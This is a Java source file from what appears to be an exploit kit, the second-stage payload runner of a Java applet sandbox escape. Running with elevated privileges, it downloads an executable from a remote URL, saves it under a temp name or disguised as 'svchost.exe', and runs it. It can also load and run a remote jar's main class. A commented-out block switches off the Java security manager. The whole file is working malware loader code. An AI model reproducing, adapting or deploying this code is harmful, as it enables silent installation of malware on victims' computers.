twostage/src-exploit/x/PayloadRunnerOrig.java
package x;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;
import java.net.URLConnection;
import java.security.AccessController;
import java.security.PrivilegedAction;
public class PayloadRunnerOrig implements PrivilegedAction<Void> {
public static String docBase = null;
public static String pJar = null;
public static String pClass = null;
public static String[] pArgs = null;
public static String pBin = null;
public static Class<?> clClazz;
public PayloadRunnerOrig() {
AccessController.doPrivileged(this);
}
@SuppressWarnings("all")
@Override
public Void run() {
// if( pJar == null ) {
// // Default handler
// try {
// System.setSecurityManager(null);
//// System.out.println("HAXOORD! SECURITY DISABLED!");
// } catch( Exception e ) {
//// System.out.println("Failed! Security still enabled.");
// }
// return null;
// }
// Load payload privileged and execute main function.
try {
if( "demomode".equals(docBase) ) {
docBase = "file:/"+System.getProperty("user.dir").replace('\\', '/')+"/html/index.html";
}
docBase = docBase.substring(0,docBase.lastIndexOf("/")+1);
URL url = null;
boolean binaryPayload = pBin != null;
String payloadLoc = binaryPayload ? pBin
: pJar;
if( payloadLoc.matches("[a-z]+:.*") ) {
url = new URL(payloadLoc);
} else {
url = new URL(docBase+payloadLoc);
}
// System.out.println(url);
byte[] bytes = new byte[16384];
if( binaryPayload ) {
URLConnection con = url.openConnection();
InputStream in = con.getInputStream();
int bytesRead;
File downloadLoc = null;
File f = File.createTempFile("temp", ".bin");
File tempDir = f.getParentFile();
String filename = payloadLoc.substring(payloadLoc.lastIndexOf('/')+1);
if( filename.contains("?") ) {
filename = filename.substring(0,filename.indexOf("?"));
}
if( filename.length() != 0 ) {
if( !filename.endsWith(".exe") ) {
filename = filename+".exe";
}
downloadLoc = new File(tempDir+"/"+filename);
if( downloadLoc.exists() && !downloadLoc.delete() ) {
downloadLoc = new File(tempDir+"/svchost.exe");
if( downloadLoc.exists() && !downloadLoc.delete() ) {
downloadLoc = File.createTempFile("", ".exe");
}
}
}
FileOutputStream fout = new FileOutputStream(downloadLoc);
while( (bytesRead = in.read(bytes)) != -1 ) {
fout.write(bytes, 0, bytesRead);
}
in.close();
fout.close();
String[] command = new String[pArgs.length+1];
command[0] = downloadLoc.getAbsolutePath();
System.arraycopy(pArgs, 0, command, 1, pArgs.length);
Runtime.getRuntime().exec(command);
} else {
URLClassLoader cl = (URLClassLoader) clClazz.
getConstructor(new Class[] { URL[].class, ClassLoader.class }).
newInstance(new URL[] { url },null);
Class c = cl.loadClass(pClass);
Method m = c.getMethod("main", new Class[] { String[].class });
m.invoke(null, (Object)pArgs);
}
//System.out.println("Payload executed!");
} catch (Exception e) {
// System.out.println("Failed! Could not load payload.");
e.printStackTrace();
}
return null;
}
}